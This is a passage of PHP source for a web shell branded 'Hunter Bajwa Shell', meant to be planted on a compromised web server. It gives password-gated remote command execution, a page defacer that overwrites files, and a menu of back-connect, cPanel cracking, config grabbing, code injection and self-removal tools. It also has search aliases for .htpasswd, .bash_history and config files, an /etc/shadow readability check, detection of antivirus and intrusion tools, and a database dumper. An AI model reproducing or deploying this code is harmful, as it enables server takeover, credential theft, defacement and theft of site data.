91 <font></font><br>
92 </div>
93 <div class="upass">
94 <form method=post>
95 <input class="input" type="password" name="pass" size="25"/>
96 </form>
97 </div>
98 </body>
99</html>');
100}
101
102if( !isset( $_SESSION[md5($_SERVER['HTTP_HOST'])] ))
103 if( empty( $auth_pass ) ||
104 ( isset( $_POST['pass'] ) && ( md5($_POST['pass']) == $auth_pass ) ) )
105 $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
106 else
107 HunterBajwalogin();
108
109if( strtolower( substr(PHP_OS,0,3) ) == "win" )
110 $os = 'win';
111else
112 $os = 'nix';
113$safe_mode = @ini_get('safe_mode');
114$disable_functions = @ini_get('disable_functions');
115$home_cwd = @getcwd();
116if( isset( $_POST['c'] ) )
117 @chdir($_POST['c']);
118$cwd = @getcwd();
119if( $os == 'win') {
120 $home_cwd = str_replace("\\", "/", $home_cwd);
121 $cwd = str_replace("\\", "/", $cwd);
122}
123if( $cwd[strlen($cwd)-1] != '/' )
124 $cwd .= '/';
125
126if($os == 'win') {
127 $aliases = array(
128 "List Directory" => "dir",
129 "Find index.php in current dir" => "dir /s /w /b index.php",
130 "Find *config*.php in current dir" => "dir /s /w /b *config*.php",
131 "Show active connections" => "netstat -an",
132 "Show running services" => "net start",
133 "User accounts" => "net user",
134 "Show computers" => "net view",
135 "ARP Table" => "arp -a",
136 "IP Configuration" => "ipconfig /all"
137 );
138} else {
139 $aliases = array(
140 "List dir" => "ls -la",
141 "list file attributes on a Linux second extended file system" => "lsattr -va",
142 "show opened ports" => "netstat -an | grep -i listen",
143 "Find" => "",
144 "find all suid files" => "find / -type f -perm -04000 -ls",
145 "find suid files in current dir" => "find . -type f -perm -04000 -ls",
146 "find all sgid files" => "find / -type f -perm -02000 -ls",
147 "find sgid files in current dir" => "find . -type f -perm -02000 -ls",
148 "find config.inc.php files" => "find / -type f -name config.inc.php",
149 "find config* files" => "find / -type f -name \"config*\"",
150 "find config* files in current dir" => "find . -type f -name \"config*\"",
151 "find all writable folders and files" => "find / -perm -2 -ls",
152 "find all writable folders and files in current dir" => "find . -perm -2 -ls",
153 "find all service.pwd files" => "find / -type f -name service.pwd",
154 "find service.pwd files in current dir" => "find . -type f -name service.pwd",
155 "find all .htpasswd files" => "find / -type f -name .htpasswd",
156 "find .htpasswd files in current dir" => "find . -type f -name .htpasswd",
157 "find all .bash_history files" => "find / -type f -name .bash_history",
158 "find .bash_history files in current dir" => "find . -type f -name .bash_history",
159 "find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",
160 "find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",
161 "Locate" => "",
162 "locate httpd.conf files" => "locate httpd.conf",
163 "locate vhosts.conf files" => "locate vhosts.conf",
164 "locate proftpd.conf files" => "locate proftpd.conf",
165 "locate psybnc.conf files" => "locate psybnc.conf",
166 "locate my.conf files" => "locate my.conf",
167 "locate admin.php files" =>"locate admin.php",
168 "locate cfg.php files" => "locate cfg.php",
169 "locate conf.php files" => "locate conf.php",
170 "locate config.dat files" => "locate config.dat",
171 "locate config.php files" => "locate config.php",
172 "locate config.inc files" => "locate config.inc",
173 "locate config.inc.php" => "locate config.inc.php",
174 "locate config.default.php files" => "locate config.default.php",
175 "locate config* files " => "locate config",
176 "locate .conf files"=>"locate '.conf'",
177 "locate .pwd files" => "locate '.pwd'",
178 "locate .sql files" => "locate '.sql'",
179 "locate .htpasswd files" => "locate '.htpasswd'",
180 "locate .bash_history files" => "locate '.bash_history'",
181 "locate .mysql_history files" => "locate '.mysql_history'",
182 "locate .fetchmailrc files" => "locate '.fetchmailrc'",
183 "locate backup files" => "locate backup",
184 "locate dump files" => "locate dump",
185 "locate priv files" => "locate priv"
186 );
187}
188 if(isset($_POST['p1']) && $_POST['p1']=='deface') {
189 $def = base64_decode($deface);
190 file_put_contents($_POST['c'].$_POST['p2'],$def);
191 }
192function ex($in) {
193 $out = '';
194 if(function_exists('exec')) {
195 @exec($in,$out);
196 $out = @join("\n",$out);
197 }elseif(function_exists('passthru')) {
198 ob_start();
199 @passthru($in);
200 $out = ob_get_clean();
201 }elseif(function_exists('system')) {
202 ob_start();
203 @system($in);
204 $out = ob_get_clean();
205 }elseif(function_exists('shell_exec')) {
206 $out = shell_exec($in);
207 }elseif(is_resource($f = @popen($in,"r"))) {
208 $out = "";
209 while(!@feof($f))
210 $out .= fread($f,1024);
211 pclose($f);
212 }
213 return $out;
214}
215
216function which($p) {
217 $path = ex('which '.$p);
218 if(!empty($path))
219 return $path;
220 return false;
221}
222
223function printHeader() {
224 if(empty($_POST['charset']))
225 $_POST['charset'] = "UTF-8";
226 global $color;
227 global $Theme;
228 global $TabsColor;
229 echo "<html><head><link href='http://i.imgur.com/vRlLG1T.jpg' rel='Shortcut Icon' /><link href='https://fonts.googleapis.com/css?family=Josefin+Sans:400,100' rel='stylesheet' type='text/css'></head>";
230 echo '<html>
231<meta http-equiv="Content-Type" content="text/html; charset='.$_POST['charset'].'"><title>Hunter Bajwa Shell</title>
232<style>
233 body {background-color:black;color:#fff;}
234 body,td,th { font-family: Josefin Sans, sans-serif;font-size:13px;margin:0;vertical-align:top; }
235 span,h1,a { color:'.$color.' !important; }
236 span { font-weight: bolder; }
237 h1 { padding: 0px 5px;font: 14pt audiowide;margin:0px 0 0 0px; }
238 div.content { padding: 0px;margin:0 0px;background: #0F1010;border:1px solid '.$Theme.'; border-radius:5px;}
239 a { text-decoration:none; }
240 a:hover { border-bottom:0px solid #5e5e5e;text-decoration:none; }
241 a:hover{cursor: url("http://downloads.totallyfreecursors.com/cursor_files/pakistan.ani"), url("http://downloads.totallyfreecursors.com/thumbnails/PAKISTAN.gif"), auto;text-decoration:none;}
242 .ml1 { border:1px solid '.$Theme.';padding:px;margin:0;overflow: auto; }
243 .bigarea { width:100%;height:250px;margin-top:0px; border-radius:10px; border-color:'.$Theme.'; background:#2F2F2F;}
244 input, textarea, select { margin-top:0;color:#ABEFFF;background-color:black;border-radius:5px;border:1px solid '.$Theme.'; border-radis:5px;font: 10pt arial,"Courier New"; }
245 input[type="button"]:hover,input[type="submit"]:hover {background-color:#ABEFFF;color:black;text-decoration:none;}
246 form { margin:0px; background:#0F1010;}
247 #toolsTbl { text-align:center; }
248 .toolsInp { width: 80%; background:black; border-radius:5px; border-color:'.$Theme.'; }
249 .main th {text-align:left;background-color:'.$TabsColor.';}
250 .main tr:hover{background:#000000; border:5px solid;border-color:#000000;}
251 .main td, th{vertical-align:middle;}
252 .menu { height:30px; border-radius:10px;}
253 .menu th{padding:1px;border-radius: 5px; background:'.$TabsColor.'; -webkit-transform: rotate(20deg);
254 -moz-transform: rotate(20deg);
255 -o-transform: rotate(20deg);
256 -ms-transform: rotate(20deg);
257 transform: rotate(20deg);}
258 .menu th:hover{background:#0F1010;text-decoration: none;}
259 pre {font-family: Josefin Sans, sans-serif;color:#FFFFFF;}
260 #cot_tl_fixed{position:fixed;bottom:0px;font-size:12px;left:0px;padding:4px 0;clip:_top:expression(document.documentElement.scrollTop+document.documentElement.clientHeight-this.clientHeight);_left:expression(document.documentElement.scrollLeft + document.documentElement.clientWidth - offsetWidth);}
261
262
263 .cpr {margin-bottom:5px;font-weight:bold; }
264 .cpb {width:34px;margin:0 5px;}
265
266 .npoad td {padding:0;}
267 #Smevktools{
268 margin-top:50px;
269 width:500px;
270 border:1px solid;
271 border-radius:10px;
272 }
273 .smevklogo td{
274 font-size:12px;
275 font-weight:bold;
276
277
278
279 }
280 .smevklogo{
281 margin-left:5px;
282 background:url();
283 background-repeat: no-repeat;
284 background-position: CENTER;
285 background-color:#0F1010;
286 background-size: 400px 120px;
287
288
289
290 }
291 </style>
292
293</html>
294<style type="text/css">body, a:hover {text-decoration:none;cursor: url(http://cur.cursors-4u.net/cursors/cur-11/cur1054.cur), progress !important;}</style><a href="http://www.cursors-4u.com/cursor/2012/02/11/chrome-pointer.html" target="_blank" title="Chrome Pointer"><img src="http://cur.cursors-4u.net/cursor.png" border="0" alt="Chrome Pointer" style="position:absolute; top: 0px; right: 0px;" /></a>
295 <script>
296 function set(a,c,p1,p2,p3,charset) {
297 if(a != null)document.mf.a.value=a;
298 if(c != null)document.mf.c.value=c;
299 if(p1 != null)document.mf.p1.value=p1;
300 if(p2 != null)document.mf.p2.value=p2;
301 if(p3 != null)document.mf.p3.value=p3;
302 if(charset != null)document.mf.charset.value=charset;
303 }
304 function g(a,c,p1,p2,p3,charset) {
305 set(a,c,p1,p2,p3,charset);
306 document.mf.submit();
307 }
308 function a(a,c,p1,p2,p3,charset) {
309 set(a,c,p1,p2,p3,charset);
310 var params = "ajax=true";
311 for(i=0;i<document.mf.elements.length;i++)
312 params += "&"+document.mf.elements[i].name+"="+encodeURIComponent(document.mf.elements[i].value);
313 sr("'.$_SERVER['REQUEST_URI'].'", params);
314 }
315 function sr(url, params) {
316 if (window.XMLHttpRequest) {
317 req = new XMLHttpRequest();
318 req.onreadystatechange = processReqChange;
319 req.open("POST", url, true);
320 req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
321 req.send(params);
322 }
323 else if (window.ActiveXObject) {
324 req = new ActiveXObject("Microsoft.XMLHTTP");
325 if (req) {
326 req.onreadystatechange = processReqChange;
327 req.open("POST", url, true);
328 req.setRequestHeader ("Content-Type", "application/x-www-form-urlencoded");
329 req.send(params);
330 }
331 }
332 }
333 function processReqChange() {
334 if( (req.readyState == 4) )
335 if(req.status == 200) {
336 //alert(req.responseText);
337 var reg = new RegExp("(\\d+)([\\S\\s]*)", "m");
338 var arr=reg.exec(req.responseText);
339 eval(arr[2].substr(0, arr[1]));
340 }
341 else alert("Request error!");
342 }
343 </script>
344 <head><link href="https://fonts.googleapis.com/css?family=Audiowide" ></head><body><div style="position:absolute;width:100%;top:0;left:0;"><div style="margin:5px;background:black;"><div class="content" style="border:1px solid '.$Theme.'; border-radius:5px;">
345 <form method=post name=mf style="display:none;">
346 <input type=hidden name=a value="'.(isset($_POST['a'])?$_POST['a']:'').'">
347 <input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">
348 <input type=hidden name=p1 value="'.(isset($_POST['p1'])?htmlspecialchars($_POST['p1']):'').'">
349 <input type=hidden name=p2 value="'.(isset($_POST['p2'])?htmlspecialchars($_POST['p2']):'').'">
350 <input type=hidden name=p3 value="'.(isset($_POST['p3'])?htmlspecialchars($_POST['p3']):'').'">
351 <input type=hidden name=charset value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
352 </form>';
353 $freeSpace = @diskfreespace($GLOBALS['cwd']);
354 $totalSpace = @disk_total_space($GLOBALS['cwd']);
355 $totalSpace = $totalSpace?$totalSpace:1;
356 $disable_functions = @ini_get('disable_functions');
357 $release = @php_uname('r');
358 $kernel = @php_uname('s');
359 if(!function_exists('posix_getegid')) {
360 $user = @get_current_user();
361 $uid = @getmyuid();
362 $gid = @getmygid();
363 $group = "?";
364 } else {
365 $uid = @posix_getpwuid(@posix_geteuid());
366 $gid = @posix_getgrgid(@posix_getegid());
367 $user = $uid['name'];
368 $uid = $uid['uid'];
369 $group = $gid['name'];
370 $gid = $gid['gid'];
371 }
372 $cwd_links = '';
373 $path = explode("/", $GLOBALS['cwd']);
374 $n=count($path);
375 for($i=0;$i<$n-1;$i++) {
376 $cwd_links .= "<a href='#' onclick='g(\"FilesMan\",\"";
377 for($j=0;$j<=$i;$j++)
378 $cwd_links .= $path[$j].'/';
379 $cwd_links .= "\")'>".$path[$i]."/</a>";
380 }
381 $charsets = array('UTF-8', 'Windows-1251', 'KOI8-R', 'KOI8-U', 'cp866');
382 $opt_charsets = '';
383 foreach($charsets as $item)
384 $opt_charsets .= '<option value="'.$item.'" '.($_POST['charset']==$item?'selected':'').'>'.$item.'</option>';
385 $m = array('Sec. Info'=>'SecInfo','Files'=>'FilesMan','Sql'=>'Sql','Console'=>'Console','Bypasser'=>'SafeMode','Safe Mode'=>'Bypass','CgiShell'=>'CgiShell','Defacer' => 'Deface','Mini Shell'=>'cleanshell','CP Cracker'=>'cpcrack','Symlink'=>'usescript','Config'=>'configgrab','Zone-h Notifier'=>'usefulla','Backup'=>'Backupper','String tools'=>'StringTools','Shells'=>'ImportScripts','Scripts'=>'ImportTools','Back Connecter'=>'BackConnect','Readable Dirs'=>'Readable','Port Scanner'=>'PortScanner','Code Injector'=>'Injector','Dir Deface'=>'DirDefacer','Domains' => 'Domain','Self Remove' => 'SelfRemove');
386 if(!empty($GLOBALS['auth_pass']))
387 $m['Leave'] = 'Logout';
388 $menu = '';
389 foreach($m as $k => $v)
390 $menu .= '<th><a href="#" onclick="g(\''.$v.'\',null,\'\',\'\',\'\')">'.$k.'</a></th>';
391 $drives = "";
392 if ($GLOBALS['os'] == 'win') {
393 foreach( range('a','z') as $drive ){
394 if (is_dir($drive.':\\'))
395 $drives .= '<a href="#" onclick="g(\'FilesMan\',\''.$drive.':/\')">[ '.$drive.' ]</a> ';
396 }
397 $drives .= '<br />: ';
398 }
399 if($GLOBALS['os'] == 'nix') {
400 $dominios = @file_get_contents("/etc/named.conf");
401 if(!$dominios) {
402 $DomainS = "/var/named";
403 $Domainonserver = scandir($DomainS);
404 $d0c = count($Domainonserver);
405 } else {
406 @preg_match_all('/.*?zone "(.*?)" {/', $dominios, $out);
407 $out = sizeof(array_unique($out[1]));
408 $d0c = $out." Domains";
409 }
410 } else {
411 $d0c = "1";
412 }
413 if($GLOBALS['os'] == 'nix' )
414 {
415 $usefl = ''; $dwnldr = '';
416 if(!@ini_get('safe_mode')) {
417 $temp = array();
418 $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
419 foreach($userful as $item) { if(which($item)) $temp[]= $item; }
420 $usefl = implode(', ',$temp);
421 $temp = array();
422 $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
423 foreach($downloaders as $item2) { if(which($item2)) $temp[]= $item2; }
424 $dwnldr = implode(', ',$temp);
425 } else {
426 $usefl = ' ------- '; $dwnldr = ' ------- ';
427 }
428 } else {
429 $usefl = ' ------- '; $dwnldr = ' ------- ';
430 }
431 echo '<div class="smevklogo"><table class="info" cellpadding="0" cellspacing="0" width="100%"><tr>
432 <td><table cellpadding="3" cellspacing="0" class="npoad"><tr><td width="80px;"><span>Uname</span></td><td>: <nobr>'.substr(@php_uname(), 0, 120).'</nobr></td></tr>
433 <tr><td><span>User</span></td><td>: '.$uid.' ( '.$user.' ) <span>Group: </span> '.$gid.' ( '.$group.' )</td></tr><tr><td><span>Server</span></td><td>: '.@getenv('SERVER_SOFTWARE').'</td></tr><tr><td><span>Useful</span></td><td>: '.$usefl.'</td></tr><tr><td><span>Downloaders</span></td><td>: '.$dwnldr.'</td></tr><tr><td><span>D/functions</span></td><td>: '.($disable_functions?$disable_functions:'All Function Enable').'</td></tr><tr><td><span>'.($GLOBALS['os'] == 'win'?'Drives<br />Cwd':'Cwd').'</span></td><td>: '.$drives.''.$cwd_links.' '.viewPermsColor($GLOBALS['cwd']).' <a href=# onclick="g(\'FilesMan\',\''.$GLOBALS['home_cwd'].'\',\'\',\'\',\'\')">[ home ]</a></td></tr></table></td>'.
434 '<td width=4><nobr><span>Sv IP</span><br><span>Your IP</span><br /><span>HDD</span><br /><span>Free</span><br /><span>PHP</span><br /><span>Safe Mode</span><br /><span>Domains</span></nobr></td>'.
435 '<td><nobr>: '.gethostbyname($_SERVER["HTTP_HOST"]).'<br>: '.$_SERVER['REMOTE_ADDR'].'<br />: '.viewSize($totalSpace).'<br />: '.viewSize($freeSpace).' ('.(int)($freeSpace/$totalSpace*100).'%)<br>: '.@phpversion().' <a href=# onclick="g(\'Php\',null,null,\'info\')">[ phpinfo ]</a><br />: '.($GLOBALS['safe_mode']?'<font color=red>ON</font>':'<font color='.$color.'<b>OFF</b></font>').'<br />: '.$d0c.'</nobr></td></tr></table></div>'.
436 '</div></div><div style="margin:5;background:black;"><div class="content" style="border-top:5px solid 430303;padding:2px;"><table cellpadding="3" cellspacing="0" width="100%" class="menu"><tr>'.$menu.'</tr></table></div></div><div style="margin:5;background:black;">';
437}
438function printFooter() {
439 $is_writable = is_writable($GLOBALS['cwd'])?"<font color=".$color.">[ Writeable ]</font>":"<font color=#EB4949>[ Not writable ]</font>";
440
441echo '</div><div style="margin:5px;background:black;"><div class="content" style="border:1px solid '.$Theme.'; border-radius:5px;">
442<table class="info" id="toolsTbl" cellpadding="3" cellspacing="0" width="100%">
443 <tr>
444 <td><form onsubmit="g(null,this.c.value);return false;"><span>Change dir:</span><br><input class="toolsInp" type=text name=c value="'.htmlspecialchars($GLOBALS['cwd']).'"><input type=submit value=">>"></form></td>
445 <td><form onsubmit="g(\'FilesTools\',null,this.f.value);return false;"><span>Read file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form></td>
446 </tr>
447 <tr>
448 <td><form onsubmit="g(\'FilesMan\',null,\'mkdir\',this.d.value);return false;"><span>Make dir:</span><br><input class="toolsInp" type=text name=d><input type=submit value=">>"></form>'.$is_writable.'</td>
449 <td><form onsubmit="g(\'FilesTools\',null,this.f.value,\'mkfile\');return false;"><span>Make file:</span><br><input class="toolsInp" type=text name=f><input type=submit value=">>"></form>'.$is_writable.'</td>
450 </tr>
451 <tr>
452 <td><form onsubmit="g(\'Console\',null,this.c.value);return false;"><span>Execute:</span><br><input class="toolsInp" type=text name=c value=""><input type=submit value=">>"></form></td>
453 <td><form method="post" ENCTYPE="multipart/form-data">
454 <input type=hidden name=a value="FilesMAn">
455 <input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">
456 <input type=hidden name=p1 value="uploadFile">
457 <input type=hidden name=charset value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
458 <span>Upload file:</span><br><input class="toolsInp" type=file name=f><input type=submit value=">>"></form>'.$is_writable.'</td>
459 </tr>
460</table></div></div>
461<div style="margin:5px;background:black;"><div class="content" style="border:2px solid '.$Theme.';text-align:center;font-weight:bold; border-radius:6px;margin:auto; width:500;">Real Shell By Hunter Bajwa</a></div></div>
462</div></div>
463
464</body></html>';
465}
466
467if ( !function_exists("posix_getpwuid") && (strpos($GLOBALS['disable_functions'], 'posix_getpwuid')===false) ) { function posix_getpwuid($p) { return false; } }
468if ( !function_exists("posix_getgrgid") && (strpos($GLOBALS['disable_functions'], 'posix_getgrgid')===false) ) { function posix_getgrgid($p) { return false; } }
469
470
471function viewSize($s) {
472 if($s >= 1073741824)
473 return sprintf('%1.2f', $s / 1073741824 ). ' GB';
474 elseif($s >= 1048576)
475 return sprintf('%1.2f', $s / 1048576 ) . ' MB';
476 elseif($s >= 1024)
477 return sprintf('%1.2f', $s / 1024 ) . ' KB';
478 else
479 return $s . ' B';
480}
481
482function perms($p) {
483 if (($p & 0xC000) == 0xC000)$i = 's';
484 elseif (($p & 0xA000) == 0xA000)$i = 'l';
485 elseif (($p & 0x8000) == 0x8000)$i = '-';
486 elseif (($p & 0x6000) == 0x6000)$i = 'b';
487 elseif (($p & 0x4000) == 0x4000)$i = 'd';
488 elseif (($p & 0x2000) == 0x2000)$i = 'c';
489 elseif (($p & 0x1000) == 0x1000)$i = 'p';
490 else $i = 'u';
491 $i .= (($p & 0x0100) ? 'r' : '-');
492 $i .= (($p & 0x0080) ? 'w' : '-');
493 $i .= (($p & 0x0040) ? (($p & 0x0800) ? 's' : 'x' ) : (($p & 0x0800) ? 'S' : '-'));
494 $i .= (($p & 0x0020) ? 'r' : '-');
495 $i .= (($p & 0x0010) ? 'w' : '-');
496 $i .= (($p & 0x0008) ? (($p & 0x0400) ? 's' : 'x' ) : (($p & 0x0400) ? 'S' : '-'));
497 $i .= (($p & 0x0004) ? 'r' : '-');
498 $i .= (($p & 0x0002) ? 'w' : '-');
499 $i .= (($p & 0x0001) ? (($p & 0x0200) ? 't' : 'x' ) : (($p & 0x0200) ? 'T' : '-'));
500 return $i;
501}
502
503function viewPermsColor($f) {
504 if (!@is_readable($f))
505 return '<font color=#FF0000><b>'.perms(@fileperms($f)).'</b></font>';
506 elseif (!@is_writable($f))
507 return '<font color=white><b>'.perms(@fileperms($f)).'</b></font>';
508 else
509 return '<font color=#00BB00><b>'.perms(@fileperms($f)).'</b></font>';
510}
511
512if(!function_exists("scandir")) {
513 function scandir($dir) {
514 $dh = opendir($dir);
515 while (false !== ($filename = readdir($dh))) {
516 $files[] = $filename;
517 }
518 return $files;
519 }
520}
521
522function actionSecInfo() {
523 printHeader();
524 echo '<h1>Server security information</h1><div class=content>';
525 function showSecParam($n, $v) {
526 $v = trim($v);
527 if($v) {
528 echo '<span>'.$n.': </span>';
529 if(strpos($v, "\n") === false)
530 echo $v.'<br>';
531 else
532 echo '<pre class=ml1>'.$v.'</pre>';
533 }
534 }
535
536 showSecParam('Server software', @getenv('SERVER_SOFTWARE'));
537 showSecParam('Disabled PHP Functions', ($GLOBALS['disable_functions'])?$GLOBALS['disable_functions']:'none');
538 showSecParam('Open base dir', @ini_get('open_basedir'));
539 showSecParam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
540 showSecParam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
541 showSecParam('cURL support', function_exists('curl_version')?'enabled':'no');
542 $temp=array();
543 if(function_exists('mysql_get_client_info'))
544 $temp[] = "MySql (".mysql_get_client_info().")";
545 if(function_exists('mssql_connect'))
546 $temp[] = "MSSQL";
547 if(function_exists('pg_connect'))
548 $temp[] = "PostgreSQL";
549 if(function_exists('oci_connect'))
550 $temp[] = "Oracle";
551 showSecParam('Supported databases', implode(', ', $temp));
552 echo '<br>';
553
554 if( $GLOBALS['os'] == 'nix' ) {
555 $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
556 $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
557 $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
558 showSecParam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href='#' onclick='g(\"FilesTools\", \"/etc/\", \"passwd\")'>[view]</a>":'no');
559 showSecParam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href='#' onclick='g(\"FilesTools\", \"etc\", \"shadow\")'>[view]</a>":'no');
560 showSecParam('OS version', @file_get_contents('/proc/version'));
561 showSecParam('Distr name', @file_get_contents('/etc/issue.net'));
562 if(!$GLOBALS['safe_mode']) {
563 echo '<br>';
564 $temp=array();
565 foreach ($userful as $item)
566 if(which($item)){$temp[]=$item;}
567 showSecParam('Userful', implode(', ',$temp));
568 $temp=array();
569 foreach ($danger as $item)
570 if(which($item)){$temp[]=$item;}
571 showSecParam('Danger', implode(', ',$temp));
572 $temp=array();
573 foreach ($downloaders as $item)
574 if(which($item)){$temp[]=$item;}
575 showSecParam('Downloaders', implode(', ',$temp));
576 echo '<br/>';
577 showSecParam('Hosts', @file_get_contents('/etc/hosts'));
578 showSecParam('HDD space', ex('df -h'));
579 showSecParam('Mount options', @file_get_contents('/etc/fstab'));
580 }
581 } else {
582 showSecParam('OS Version',ex('ver'));
583 showSecParam('Account Settings',ex('net accounts'));
584 showSecParam('User Accounts',ex('net user'));
585 }
586 echo '</div>';
587 printFooter();
588}
589
590
591function actionSql() {
592 class DbClass {
593 var $type;
594 var $link;
595 var $res;
596 function DbClass($type) {
597 $this->type = $type;
598 }
599 function connect($host, $user, $pass, $dbname){
600 switch($this->type) {
601 case 'mysql':
602 if( $this->link = @mysql_connect($host,$user,$pass,true) ) return true;
603 break;
604 case 'pgsql':
605 $host = explode(':', $host);
606 if(!$host[1]) $host[1]=5432;
607 if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
608 break;
609 }
610 return false;
611 }
612 function selectdb($db) {
613 switch($this->type) {
614 case 'mysql':
615 if (@mysql_select_db($db))return true;
616 break;
617 }
618 return false;
619 }
620 function query($str) {
621 switch($this->type) {
622 case 'mysql':
623 return $this->res = @mysql_query($str);
624 break;
625 case 'pgsql':
626 return $this->res = @pg_query($this->link,$str);
627 break;
628 }
629 return false;
630 }
631 function fetch() {
632 $res = func_num_args()?func_get_arg(0):$this->res;
633 switch($this->type) {
634 case 'mysql':
635 return @mysql_fetch_assoc($res);
636 break;
637 case 'pgsql':
638 return @pg_fetch_assoc($res);
639 break;
640 }
641 return false;
642 }
643 function listDbs() {
644 switch($this->type) {
645 case 'mysql':
646 return $this->res = @mysql_list_dbs($this->link);
647 break;
648 case 'pgsql':
649 return $this->res = $this->query("SELECT datname FROM pg_database");
650 break;
651 }
652 return false;
653 }
654 function listTables() {
655 switch($this->type) {
656 case 'mysql':
657 return $this->res = $this->query('SHOW TABLES');
658 break;
659 case 'pgsql':
660 return $this->res = $this->query("select table_name from information_schema.tables where (table_schema != 'information_schema' AND table_schema != 'pg_catalog') or table_name = 'pg_user'");
661 break;
662 }
663 return false;
664 }
665 function error() {
666 switch($this->type) {
667 case 'mysql':
668 return @mysql_error($this->link);
669 break;
670 case 'pgsql':
671 return @pg_last_error($this->link);
672 break;
673 }
674 return false;
675 }
676 function setCharset($str) {
677 switch($this->type) {
678 case 'mysql':
679 if(function_exists('mysql_set_charset'))
680 return @mysql_set_charset($str, $this->link);
681 else
682 $this->query('SET CHARSET '.$str);
683 break;
684 case 'mysql':
685 return @pg_set_client_encoding($this->link, $str);
686 break;
687 }
688 return false;
689 }
690 function dump($table) {
691 switch($this->type) {
692 case 'mysql':
693 $res = $this->query('SHOW CREATE TABLE `'.$table.'`');
694 $create = mysql_fetch_array($res);
695 echo $create[1].";\n\n";
696 $this->query('SELECT * FROM `'.$table.'`');
697 while($item = $this->fetch()) {
698 $columns = array();
699 foreach($item as $k=>$v) {
700 $item[$k] = "'".@mysql_real_escape_string($v)."'";
701 $columns[] = "`".$k."`";
702 }
703 echo 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
704 }
705 break;
706 case 'pgsql':
707 $this->query('SELECT * FROM '.$table);
708 while($item = $this->fetch()) {
709 $columns = array();
710 foreach($item as $k=>$v) {
711 $item[$k] = "'".addslashes($v)."'";
712 $columns[] = $k;
713 }
714 echo 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
715 }
716 break;
717 }
718 return false;
719 }
720 };
721 $db = new DbClass(@$_POST['type']);
722 if(@$_POST['p2']=='download') {
723 ob_start("ob_gzhandler", 4096);
724 $db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
725 $db->selectdb($_POST['sql_base']);
726 header("Content-Disposition: attachment; filename=dump.sql");
727 header("Content-Type: text/plain");
728 foreach($_POST['tbl'] as $v)
729 $db->dump($v);
730 exit;
731 }
732 printHeader();
733 echo '<h1>Sql browser</h1><div class=content>
734 <form name="sf" method="post">
735 <table cellpadding="2" cellspacing="0">
736 <tr>
737 <td>Type</td>
738 <td>Host</td>
739 <td>Login</td>
740 <td>Password</td>
741 <td>Database</td>
742 <td></td>
743 </tr>
744 <tr>
745 <input type=hidden name=a value=Sql>
746 <input type=hidden name=p1 value=\'query\'>
747 <input type=hidden name=p2>
748 <input type=hidden name=c value="'.htmlspecialchars($GLOBALS['cwd']).'">
749 <input type=hidden name=charset value="'.(isset($_POST['charset'])?$_POST['charset']:'').'">
750 <td>
751 <select name=\'type\'>
752 <option value="mysql" '.(@$_POST['type']=='mysql'?'selected':'').'>MySql</option>
753 <option value="pgsql" '.(@$_POST['type']=='pgsql'?'selected':'').'>PostgreSql</option>
754 </select></td>
755 <td><input type=text name=sql_host value="'.(empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])).'"></td>
756 <td><input type=text name=sql_login value="'.(empty($_POST['sql_login'])?'root':htmlspecialchars($_POST['sql_login'])).'"></td>
757 <td><input type=text name=sql_pass value="'.(empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])).'"></td>
758 <td>';
759 $tmp = "<input type=text name=sql_base value=''>";
760 if(isset($_POST['sql_host'])){
761 if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
762 switch($_POST['charset']) {
763 case "Windows-1251": $db->setCharset('cp1251'); break;
764 case "UTF-8": $db->setCharset('utf8'); break;
765 case "KOI8-R": $db->setCharset('koi8r'); break;
766 case "KOI8-U": $db->setCharset('koi8u'); break;
767 case "cp866": $db->setCharset('cp866'); break;
768 }
769 $db->listDbs();
770 echo "<select name=sql_base><option value=''></option>";
771 while($item = $db->fetch()) {
772 list($key, $value) = each($item);
773 echo '<option value="'.$value.'" '.($value==$_POST['sql_base']?'selected':'').'>'.$value.'</option>';
774 }
775 echo '</select>';
776 }
777 else echo $tmp;
778 }else
779 echo $tmp;
780 echo '</td>
781 <td><input type=submit value=">>"></td>
782 </tr>
783 </table>
784 <script>
785 function st(t,l) {
786 document.sf.p1.value = \'select\';
787 document.sf.p2.value = t;
788 if(l!=null)document.sf.p3.value = l;
789 document.sf.submit();
790 }
791 function is() {
792 for(i=0;i<document.sf.elements[\'tbl[]\'].length;++i)
793 document.sf.elements[\'tbl[]\'][i].checked = !document.sf.elements[\'tbl[]\'][i].checked;
794 }
795 </script>';
796 if(isset($db) && $db->link){
797 echo "<br/><table width=100% cellpadding=2 cellspacing=0>";
798 if(!empty($_POST['sql_base'])){
799 $db->selectdb($_POST['sql_base']);
800 echo "<tr><td width=1 style='border-top:1px solid #a3e956;border-right:2px solid #a3e956;'><span>Tables:</span><br><br>";
